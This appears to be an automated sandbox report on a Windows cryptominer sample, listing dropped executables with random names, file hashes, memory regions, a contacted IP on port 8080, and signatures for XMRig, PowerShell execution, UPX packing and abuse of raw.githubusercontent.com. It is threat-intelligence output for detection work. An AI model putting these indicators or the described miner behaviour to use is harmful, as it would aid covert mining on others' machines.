C:\Windows\System\jFbNJMJ.exe

C:\Windows\System\jFbNJMJ.exe

C:\Windows\System\cSrKuqY.exe

C:\Windows\System\cSrKuqY.exe

C:\Windows\System\cNjcBxA.exe

C:\Windows\System\cNjcBxA.exe

C:\Windows\System\baGIxoF.exe

C:\Windows\System\baGIxoF.exe

C:\Windows\System\xIZkiRU.exe

C:\Windows\System\xIZkiRU.exe

C:\Windows\System\LiRRjry.exe

C:\Windows\System\LiRRjry.exe

C:\Windows\System\XnGwkRk.exe

C:\Windows\System\XnGwkRk.exe

C:\Windows\System\cwhQWTc.exe

C:\Windows\System\cwhQWTc.exe

C:\Windows\System\qWUYlcz.exe

C:\Windows\System\qWUYlcz.exe

C:\Windows\System\DBUrZRE.exe

C:\Windows\System\DBUrZRE.exe

C:\Windows\System\UcPcfnD.exe

C:\Windows\System\UcPcfnD.exe

C:\Windows\System\QBOVyYD.exe

C:\Windows\System\QBOVyYD.exe

C:\Windows\System\DVwuKeV.exe

C:\Windows\System\DVwuKeV.exe

C:\Windows\System\XmaAMpI.exe

C:\Windows\System\XmaAMpI.exe

C:\Windows\System\KllMEnN.exe

C:\Windows\System\KllMEnN.exe

C:\Windows\System\QWJmigw.exe

C:\Windows\System\QWJmigw.exe

C:\Windows\System\uMHEZZq.exe

C:\Windows\System\uMHEZZq.exe

C:\Windows\System\WWENbJw.exe

C:\Windows\System\WWENbJw.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

memory/2196-0-0x00000000000F0000-0x0000000000100000-memory.dmp

\Windows\system\ySEPBUs.exe

MD5 f72e367a36bc6a5465b7974764312dbe
SHA1 cf16b90e35a96df5c7a002169167b7896801723c
SHA256 235e330736b4bc2b62842b4b64a9d9ba1fb71d4140db1e79d1f79920e6cb969b
SHA512 c657c22f64570d48e88dc517ae569962a104e333b943b8e78efd22bdb76fee1dd196196d8fe334a5751a9ddc3a3919fc70c41775266b75319905649ea87b4700

C:\Windows\system\hwDwGpz.exe

MD5 9d0511390ff41330b38cfbd4fc00f234
SHA1 0cae4c52443e6e2fe4509881d41a4b0081c1a1c9
SHA256 cbcb5c17e1d4dd4cc5711626b490b0fc092fd7097d518b9c49683b02c0e0f4ee
SHA512 b2fc6d7bc4a82d64f9e2c6a56c26561c9874cf8af4b92e6c5f6320badf52beae8c62c99731bf8c5ed4f4440713ed750e845619e48ffb5be212856ca53b45ba51

memory/2376-19-0x000000013F130000-0x000000013F526000-memory.dmp

\Windows\system\OXIMvCN.exe

MD5 3f39e6ecc2cea7b3b5935ae7cc99adfb
SHA1 225fb28ff3d328db9d4e372b3873e4c2e7e45fbd
SHA256 71dfddd473ea48faab93108cbf0533e2278d897b6f80530b698ea97f75b60cff
SHA512 b7276f5a0604ded95c0c82d6f740eeea8da8a982e8f328821100de89c50e8de78efe6b68c5667ff1fae5d6138869b7657bab7b3ffcf88a5fd9c11181d1e53baf

memory/2132-26-0x000000013FD90000-0x0000000140186000-memory.dmp

memory/2196-31-0x0000000002E90000-0x0000000003286000-memory.dmp

\Windows\system\xryNSlD.exe

MD5 b216c8e22876d7a9720415b5c059643c
SHA1 efc4ab9814839c9626bd91fe5adfa9ada1cc279a
SHA256 e2f75a804dce177ec9f53033c5e75ceddffb242af8abdecc5f5265f739059513
SHA512 7df3d9473ac0840205e9c98d8379e5340e6b9ade371433833d7b46bad97adefbba8c153523e9a7731d8c76ab3a0ca0040249c8e50afb1fce6e09d1c98b96c3f2

C:\Windows\system\smiSLgQ.exe

MD5 690e104ca1389d3d0d16c9b6f0056502
SHA1 63289232eecca82b8ef4a2d39c32e3b2659e586d
SHA256 a27db1ea1f814af0aea7c55b0703f5a0759459e1992767e1c047274294a3ea55
SHA512 03608aed8438419e87b61e5a2d8893432e579318e177978b6130a2a3c2282b25031a7e4d41c86b7c6e348d3a4bb810043aa09f0d49b50ceac68d67157afe7a35

memory/2428-66-0x000000013F800000-0x000000013FBF6000-memory.dmp

\Windows\system\HMrlYTT.exe

MD5 0a7b87cd86fbbb4ae8b241bdbc53d361
SHA1 378d5762a02ccb41188f88b615381ae21549d898
SHA256 e7b08379e67da77a5de1a732c429b7c369632c3fc0cca37eda5a81429a881538
SHA512 fe564d11b84bc9afdc721ac2119b5c03621349c2ec21862816556a93067cf462fb82b7c3a823cc396126a21f3fc5d29b20848c8970a8c49f34c8e1e1ec7a6c5d

memory/2196-74-0x0000000003710000-0x0000000003B06000-memory.dmp

memory/2196-79-0x000000013F800000-0x000000013FBF6000-memory.dmp

memory/2196-86-0x000000013FB40000-0x000000013FF36000-memory.dmp

C:\Windows\system\pUfQfkn.exe

MD5 d1e8a52013da627a21a1910cbe1c0902
SHA1 c986b60fc15a045da9486d1031b5f13923895aa5
SHA256 44cd5e1f1eaaa2a7d3406609d6c2f3627899e1237a21f319f2094cf350dd3070
SHA512 1741128fe42fe29611a548a9f870ee8ad3c8a31643166d4901de51e835be4114c77ccbc3792de16d0323629427c8ad70b5da7fddc5138cd3e94a321a81f51d6f

\Windows\system\hkJMpDu.exe

MD5 75df75f799e9dddb8f38eb4cafcda070
SHA1 39cdde549bb88b524d54f59917edc04214378623
SHA256 8f7c4b408675315d0899d27fbc2adfef04424a711269b2b792d4ad338cd67917
SHA512 e397b53f19e744c3ce118f29e8216cfbca2ed2f3700927a54515e671ba7f4df002b2ef42712369432f8c298583fb71448bc019d30529be492bb4a2d4272469eb

C:\Windows\system\zoEBvre.exe

MD5 2c48c087eede170dacc4ddaec0f66e07
SHA1 5ff6a9bd32da53fa92ce709ef8d36224a127f594
SHA256 713d98993a74503ff9940a0a3d51e670e552a89559caf83779036063de6692b2
SHA512 b3321af6d6d69ac127f724e3ac6bd34916375f0186e3e8753f2373c638171c672afd5e1b071f23156e8bd4d744db2d82ab5690a0a604426f26f850f566dfe4c7

C:\Windows\system\gwoRNsk.exe

MD5 dbbcd5e795f93d0153973ee69c26dde2
SHA1 e22874c9cfaefb886e906ada30cc9a060083ec89
SHA256 249789962445160b008ccd79adb3949a2f49d8dfaa0185c051ca7ebaf79bb045
SHA512 d6531d084f9c8ecc971fec51e42c252d5e6cbd304df6f2dd219cec8e034d5a0ee426bc69ae56c6666032edcf27579acd641128356ad3e4e83bbf16168ca01599

memory/2196-3782-0x0000000003710000-0x0000000003B06000-memory.dmp

memory/2196-3764-0x000000013FED0000-0x00000001402C6000-memory.dmp

memory/2196-4071-0x000000013F300000-0x000000013F6F6000-memory.dmp

memory/2196-3147-0x000000013F300000-0x000000013F6F6000-memory.dmp

C:\Windows\system\GpYlcpA.exe

MD5 17052d5f2be9b1606c380ebdea0acbfb
SHA1 352931bd4b0707ed06e86bcdb48a65bdbae4d20a
SHA256 c3c40795615f6206bf2d67d14a3d01774d5fdb2703841991db9592f100d6ad9d
SHA512 5175e705c0923d4df79d6302fd4905b6713ceaf0765bde2bb57a2564587a64e9663228c6580c31a1a932ccce82bb7ad805715f0e25e6163e4d594cd5d9993449

C:\Windows\system\flCAdqM.exe

MD5 ffbabdf143d715e1b32f80a940aaf409
SHA1 4899ce6f970e0e38a1300abdff7e0473b3a8c450
SHA256 5c6a7e025e56c95eb7b6ababb8ccd1a6bd94a64fe390962954c34c2a8f1724df
SHA512 af8dcca3193af75dd7127621adea84471e8dae75e6cf351276d82182c84cc2ce3eaf222af978c17dfd80ba70db28f6697bcbffb98ed20d7f07721d9b169a6e25

C:\Windows\system\QlhXaDE.exe

MD5 bd8b39ac0a2bdddfb3a7e05ebe869ad7
SHA1 2138213019d5574e182fda8b8017624b334e9713
SHA256 3a0f7734399abea5d60f127b2e3125501bf9d001085dafd3d3cbc9849b12f0cb
SHA512 124c7d87afb2fbba0c77f0c90cd039803f6bbfca16c711fdcb3017919f3533d0d5f58d8e6d40e75c22bef0312b1196bf6bbb48c3fb8ede0aed89f552311e70f2

C:\Windows\system\BVKbfKl.exe

MD5 9c9d5f78a6a8d0c943bc6ebcb0b0ad27
SHA1 05b679fa193ffcdd592fbf23b988623f3a6468db
SHA256 5016c32d1912c1e86d299b2d7ac0088b2517058d00ab1d19743d0b58a7bea404
SHA512 45725bb77d9b9fb6cee0734f8905168a7ff161fe1bdebdd3e216ae79ede15e4871cb7262b3f146b99d557d393cc1361c4d69bc9332f31a141afec45da01a3657

C:\Windows\system\epfFlsR.exe

MD5 09f57a41a6c64a8b4080c5874b46ba85
SHA1 d52edd3b38736516acdfda6e7782312301f943ef
SHA256 dfb4bfafe4c61718a4f36ecfb43a02b46acb3af2ed47aa03c7f8d4271bc73f0e
SHA512 069398197d867be5f184e08cc831516cc75d8342ba5e661f35fc43ff8ec37deb763080fe934758dff9d131975ccee3fc15ef0a96dec42feda7e4778881724cf5

C:\Windows\system\WhRyIFF.exe

MD5 157780b55add98f87146320eb19b27cb
SHA1 1a665c585e9faec3dd4c86a0313a176159706467
SHA256 749e1827d9edc5c3269b90ea53d3d1d91f6b755803fae163ee09a65acb7123a2
SHA512 07e08b52b03c6eff6ddcc4607bf4b23cf22a16eb8d43887ebba8a30c590f1c9ffc82ba4e9240bcbcce1517636e6105a40d29cfd3880ad39d401906edb780d5bf

C:\Windows\system\seGZyPG.exe

MD5 b76cb28d77cb7113c9c0c905e17703fe
SHA1 3e7a1d249a068fa2c46eb4dbb51fc8da2f9808e8
SHA256 c3038775e67e66683ba777806880792ae80ee8621074dd06b80dbc8367dee002
SHA512 25cca4056636fb86c67d91c4d0e57f16a734e76c8cfe7a4acb2432d0e67aff5b69575a742a17d6115e4ad8f7b13d50f37ef97b04ba4202ea269f6b7faebbe52f

C:\Windows\system\lPvhgkD.exe

MD5 026e2b57e83b66563e70201a43475a72
SHA1 43371ba9fe3b752123d4702fa1d5afc674edca80
SHA256 3f69ca6845733d92eb191f27a6d7b405b0bf809efd197f28078b0edf764ebe2a
SHA512 63365626d0e7ec013475209a9a598757620cc5700f9d3d2e68a3c1d54fd943ec727398a618a39b4091cf2a33cede909919a773193f344097dae4c4a2e8dd9f0e

C:\Windows\system\rixMtLF.exe

MD5 f3ab0a0899e9dfd75eb99a27daa72978
SHA1 28735c747ba22a04f741b1929772495b7c3fd930
SHA256 fb391fb3d07cdb0d97af1699ed309f170950cd1e12b8f00beef48ddbdd7e0a05
SHA512 d0bd1ac9aa164b0f3dab64f404e6d5fc8f0e9915bd690e85865e3358c02c42f4116633569ba760170dac531efc888488f7c52182aa8d3dba11900f969019b290

C:\Windows\system\gTCAyvO.exe

MD5 1ce18e25c2d607761f624d172c6e2e80
SHA1 09ed803f1181841c2f747f556b232d5faa55f010
SHA256 76c133e8a772e51194c26b63781a933172bc11bfc03a1104d45923c1a3b97030
SHA512 7bf7a233fa12f7400b40d0e4e57c2f835571ac58387feca7dcf043a052907cc62130bd63c1dc061e85cb4909e63a9101f93899b6fa89e077d3321734967e603c

C:\Windows\system\kLmZeaz.exe

MD5 3411b88969815fb75b567e8500f6846e
SHA1 6a118dfc151ca413553e4498fea7e1dda1a07afb
SHA256 78a26afae3ff1c2fae62088ce903bfe18dad638ddb5d1c59d6b481679fc6f1a5
SHA512 d7c071ae23e3d53f39cfc9aee016fb810683baca61a5b3b143a4dc0268bd7c13435dab993c602fb7ef7e4f87345a6c67a20c012bd667824712790f9e2a78dae4

C:\Windows\system\qgOZnMX.exe

MD5 8a6fb54267125f81e8015b1c2dd4e42f
SHA1 9a819475284fe8d7cb59d3227ec696d4c2b0892f
SHA256 14a28f9ed6deeb9bc4616a334d77b5c8a788a3d0bb7cadad770803bc285c7bc8
SHA512 bea0c74b3d60737e46ae95dbe85fdc4e22182ea3f841bfc1685c059afaf63fd35322198551fe3ba74384b3366d9c54759e97561ff2b621d9c8dc5ba2d26b8c9f

memory/1768-137-0x000000013F940000-0x000000013FD36000-memory.dmp

C:\Windows\system\pEEfbXR.exe

MD5 7b5e3663bc39b9f42e9eb69454deebfa
SHA1 61ef80570434c82301f6eb1fbc03ce787fc621bc
SHA256 e258dd58e981103348fbecc0036486553cf3fa24db20f14b54543e8446927616
SHA512 179111e3994acb78252268de03ab2b5a6182ae3e98047a50444ee227b57a4f6b376c03437b52e1fa398fe69c5554b7ed0199f254062344be2f3bfed11b6d4b40

C:\Windows\system\UkLCXyc.exe

MD5 61a75183d20a2114d1817b5ed0e142fe
SHA1 91871c0ea2c2f0fd6fc4e7433791f8d2de50237a
SHA256 bfc9c8779b4a2aa5d6536ef7946b631e30a857be6c054d9d88f26f071506c1dd
SHA512 a6a71d6026f1ae10617d2d227102281f307a12be2ad3a68b4d362ea4b3674367b773f32278c7950ba5ee08d51acbe005252d40a1b8f1e24668ec2d4ae0a8c5a7

\Windows\system\ZFXnwYe.exe

MD5 791bf9c46e73ea0d337ca61a96e784b0
SHA1 da10dd3af830ad6dcf72aa1016c7c93fc652c6bc
SHA256 5c70e0f29e9a1ff37f8db96e5d8e159d8826e5838b1d6d309f7584908b4e3a74
SHA512 57275fdc4aa8fc632b2350a59904b4449070afaa1be108cdb94205a73dbe8343fc2000179f1cb54ffc445f9aa7d10b7b6126edbdf7a7cab19dd8b4a68bc18df9

\Windows\system\YCNvqar.exe

MD5 dac724df7371b3735f77d1b9c6dc060d
SHA1 4a50038ed2cf355f314a8ea3cd265841869edb2e
SHA256 f1c59d2ee90804c0c81103a7ba2c58318ef3f431899cb6d75cc1243f534d60e3
SHA512 4de559aac50d72b9e5f07d2b542d5adc09b619bab7bf9ac0c83a259d667183c5e0661549289749db4f60df67d696e9edb0028a641a48c8fbcd24234352ec79fc

memory/2464-96-0x000000013F5C0000-0x000000013F9B6000-memory.dmp

memory/2592-89-0x000000013FA70000-0x000000013FE66000-memory.dmp

memory/2476-88-0x000000013FB40000-0x000000013FF36000-memory.dmp

C:\Windows\system\poJhkXl.exe

MD5 07956e2f9cc4b6cd44596853957adfd1
SHA1 8bc983706d2673769171457cce09dc21a1ef130f
SHA256 7ac876a85df45718d9d6b014024aed524c6339771b66beb7bc4cd7fde8af170e
SHA512 4dc2aa207d0a7fad6e8166456eca773810c2b033632832cd49412bf24b71ab28b1910c57ff52ec168c2d688321de4c3631cb314279c141b81ebcd63d7415e7d0

memory/2196-80-0x0000000003710000-0x0000000003B06000-memory.dmp

memory/2540-78-0x000000013FD70000-0x0000000140166000-memory.dmp

memory/2720-84-0x000000013F190000-0x000000013F586000-memory.dmp

memory/2196-76-0x000000013FD70000-0x0000000140166000-memory.dmp

C:\Windows\system\UWblMKU.exe

MD5 1edb421f6a6aaea6a6f07af92b472f6d
SHA1 549584d109ec8d2a18f156ba3cbe4cc65a569e86
SHA256 2803b74790338f4e1c87877146c8e1e1f05746bd9364794cbd805039be935038
SHA512 5b7e08fc315055459e075135644a827804e087ef92b7ba71b0a8421f272ca55d55431383aa733fcff82286ebe6690a94fa8cfa75a9d34d303d44042aa9f10812

memory/2976-71-0x000000013F320000-0x000000013F716000-memory.dmp

C:\Windows\system\wtbMaTi.exe

MD5 86b9b7f9b5b59bf42cec7749360206cd
SHA1 005d5452d79c2e047e3844823037d6088b08906a
SHA256 afe9bd6714239a6ade2d17c85bb783557f0d649b66b340a8d7ec81fafaeba97d
SHA512 1fb54f850d838cfb48cb7daecbd7e4f117d117e099b505929b36965c19f1d2d9c9e361bb98cce2abcebf5a7efcbcf617e6c5bee763f7f2ef586d8cdad04375c9

memory/2196-70-0x000000013FA70000-0x000000013FE66000-memory.dmp

memory/2196-69-0x0000000003710000-0x0000000003B06000-memory.dmp

C:\Windows\system\mmgPhUr.exe

MD5 29bf13927750b52c5efdf28713fa2b46
SHA1 54150e7ff479d3b9a6d1bfea6e855cdf5ae1d7ed
SHA256 82d18c7fc0b3b4ce09d6421448d44126b4611ac969d9cfdb9ccb7966997d43d6
SHA512 43dcf8cec4a58fd6b6d705159dfa639d91f0a88718475c84750127cd12c64a54680655d15b9ad85da1420fb1713d7bb81cddbc97baa4e446c550e241242d79ca

memory/2560-63-0x000000013FED0000-0x00000001402C6000-memory.dmp

memory/1224-55-0x00000000027F0000-0x00000000027F8000-memory.dmp

memory/2196-46-0x000000013FED0000-0x00000001402C6000-memory.dmp

memory/1224-45-0x000000001B650000-0x000000001B932000-memory.dmp

memory/2196-36-0x000000013FD90000-0x0000000140186000-memory.dmp

C:\Windows\system\gJaZqcx.exe

MD5 6672e6f1bc01c98f11435f88973ef976
SHA1 80468304b03eb4b4e9981c49936353eb32682aef
SHA256 2b827aa211bcc4859dadb61172ab434a03d536a275c8fa8deb19962c02a1059e
SHA512 a1b4ed5859227c48b51a5874d0909e6f0b70aef27d8263230773e94c9075198a3b887c08f316ae4e6fe34a8d9604701340bb270ae7c9df39e580ea28ae4ce1db

memory/2164-23-0x000000013F520000-0x000000013F916000-memory.dmp

C:\Windows\system\SaGdFru.exe

MD5 772e0461414d97d6323593d42c4bb07c
SHA1 d8257d890dc934163b309a8be1faad2c31bf3809
SHA256 17cca8d149515415a118a4948a1369e8e05996a4f1147fc8aef4afa13a32697f
SHA512 2df61d0662fb86b2a9124fa149d8a7001776abfa9c6088e81dcf129e98b935a11010586ed053c1211cc8e80e40e227ed4db1fcf6eec09573bd9114bba2b42e23

memory/2196-14-0x0000000003170000-0x0000000003566000-memory.dmp

memory/2196-2-0x000000013F300000-0x000000013F6F6000-memory.dmp

memory/2376-4072-0x000000013F130000-0x000000013F526000-memory.dmp

memory/2132-4073-0x000000013FD90000-0x0000000140186000-memory.dmp

memory/2164-4074-0x000000013F520000-0x000000013F916000-memory.dmp

memory/2560-4075-0x000000013FED0000-0x00000001402C6000-memory.dmp

memory/2428-4076-0x000000013F800000-0x000000013FBF6000-memory.dmp

memory/2976-4077-0x000000013F320000-0x000000013F716000-memory.dmp

memory/2720-4078-0x000000013F190000-0x000000013F586000-memory.dmp

memory/2476-4079-0x000000013FB40000-0x000000013FF36000-memory.dmp

memory/2540-4080-0x000000013FD70000-0x0000000140166000-memory.dmp

memory/2464-4082-0x000000013F5C0000-0x000000013F9B6000-memory.dmp

memory/2592-4081-0x000000013FA70000-0x000000013FE66000-memory.dmp

memory/1768-4083-0x000000013F940000-0x000000013FD36000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:01

Reported

2024-05-27 06:04

Platform

win10v2004-20240508-en

Max time kernel

134s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\SaGdFru.exe N/A
N/A N/A C:\Windows\System\ySEPBUs.exe N/A
N/A N/A C:\Windows\System\hwDwGpz.exe N/A
N/A N/A C:\Windows\System\OXIMvCN.exe N/A
N/A N/A C:\Windows\System\gJaZqcx.exe N/A
N/A N/A C:\Windows\System\mmgPhUr.exe N/A
N/A N/A C:\Windows\System\wtbMaTi.exe N/A
N/A N/A C:\Windows\System\UWblMKU.exe N/A
N/A N/A C:\Windows\System\xryNSlD.exe N/A
N/A N/A C:\Windows\System\HMrlYTT.exe N/A
N/A N/A C:\Windows\System\smiSLgQ.exe N/A
N/A N/A C:\Windows\System\poJhkXl.exe N/A
N/A N/A C:\Windows\System\YCNvqar.exe N/A
N/A N/A C:\Windows\System\pUfQfkn.exe N/A
N/A N/A C:\Windows\System\ZFXnwYe.exe N/A
N/A N/A C:\Windows\System\UkLCXyc.exe N/A
N/A N/A C:\Windows\System\kLmZeaz.exe N/A
N/A N/A C:\Windows\System\pEEfbXR.exe N/A
N/A N/A C:\Windows\System\gTCAyvO.exe N/A
N/A N/A C:\Windows\System\qgOZnMX.exe N/A
N/A N/A C:\Windows\System\rixMtLF.exe N/A
N/A N/A C:\Windows\System\lPvhgkD.exe N/A
N/A N/A C:\Windows\System\hkJMpDu.exe N/A
N/A N/A C:\Windows\System\seGZyPG.exe N/A
N/A N/A C:\Windows\System\zoEBvre.exe N/A
N/A N/A C:\Windows\System\WhRyIFF.exe N/A
N/A N/A C:\Windows\System\epfFlsR.exe N/A
N/A N/A C:\Windows\System\BVKbfKl.exe N/A
N/A N/A C:\Windows\System\gwoRNsk.exe N/A
N/A N/A C:\Windows\System\QlhXaDE.exe N/A
N/A N/A C:\Windows\System\flCAdqM.exe N/A
N/A N/A C:\Windows\System\GpYlcpA.exe N/A
N/A N/A C:\Windows\System\zsTQSfg.exe N/A
N/A N/A C:\Windows\System\askiGRV.exe N/A
N/A N/A C:\Windows\System\djYelDT.exe N/A
N/A N/A C:\Windows\System\NogQCTo.exe N/A
N/A N/A C:\Windows\System\LHwlBdA.exe N/A
N/A N/A C:\Windows\System\jfEFViD.exe N/A
N/A N/A C:\Windows\System\Gyzijzt.exe N/A
N/A N/A C:\Windows\System\qaBlhVa.exe N/A
N/A N/A C:\Windows\System\bzifaJW.exe N/A
N/A N/A C:\Windows\System\GyklXLO.exe N/A
N/A N/A C:\Windows\System\prttWPR.exe N/A
N/A N/A C:\Windows\System\XWcxnih.exe N/A
N/A N/A C:\Windows\System\MCQjKyo.exe N/A
N/A N/A C:\Windows\System\pwUBeNN.exe N/A
N/A N/A C:\Windows\System\XPUHGqQ.exe N/A
N/A N/A C:\Windows\System\YsHIFnQ.exe N/A
N/A N/A C:\Windows\System\TZiucLU.exe N/A
N/A N/A C:\Windows\System\pfTMLjb.exe N/A
N/A N/A C:\Windows\System\OVfJaxr.exe N/A
N/A N/A C:\Windows\System\ZeyZkET.exe N/A
N/A N/A C:\Windows\System\MNfVUzt.exe N/A
N/A N/A C:\Windows\System\xZiOADO.exe N/A
N/A N/A C:\Windows\System\oGLBtVT.exe N/A
N/A N/A C:\Windows\System\brwaOFj.exe N/A
N/A N/A C:\Windows\System\kcjfwLh.exe N/A
N/A N/A C:\Windows\System\tSOzyeA.exe N/A
N/A N/A C:\Windows\System\QPVJENK.exe N/A
N/A N/A C:\Windows\System\CXcIgVR.exe N/A
N/A N/A C:\Windows\System\BNCbUPE.exe N/A
N/A N/A C:\Windows\System\VKvHNeb.exe N/A
N/A N/A C:\Windows\System\rPKaoha.exe N/A
N/A N/A C:\Windows\System\kmRgCdN.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\UobXoHW.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\gedyEfq.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\azYtkoE.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\bomGlxa.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\dFuSWGs.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\UVadIGj.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\evHXLBf.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\GBnSUab.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\BNdFnwL.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\wGZjChI.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\LJHAuCU.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\uARZovt.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\uRMGlje.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\xEPoXUu.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\FqvlnuM.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\WhGiNLe.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\udIZPPE.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\VFMNAEQ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\VwuSLSj.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\QTXBdFE.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\epfFlsR.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\WNCXCsg.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\wKwWapH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\xzIOhEU.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\CXtNrIm.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
